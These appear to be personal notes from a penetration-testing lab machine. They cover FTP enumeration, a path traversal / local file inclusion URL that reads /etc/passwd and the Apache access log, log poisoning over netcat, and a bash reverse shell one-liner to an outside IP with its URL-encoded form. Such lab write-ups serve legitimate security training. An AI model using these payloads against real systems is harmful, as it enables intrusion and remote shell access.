ftp $IP 21 
ftp $IP 2121 // anonymous yes
cd pub
dir
from port 80, we get phpIPAM 1.4 -> exploit 
from port 8593 we get :  <a href="index.php?book=list">Book List</a> 
http://192.168.228.72:8593/index.php?book=../../../../../etc/passwd
then get miguel:x:1000:1000:,,,:/home/miguel:/bin/bash
since it is Apache and PHP, go to  visit
http://192.168.228.72:8593/index.php?book=../../../../../var/log/apache2/access.log
access.log -> HTTP Access logs on port 80 
so means we have local file inclusion vulnerability 
Netcat connection -> 80(apache2 http) -> plant the log with executable code
nc -nv $IP 80

bash -c 'bash -i >& /dev/tcp/192.168.45.200/9090 0>&1'
url decoder to , reverse shell payload, wrapped and url encode to 
bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.45.200%2F9090%200%3E%261%27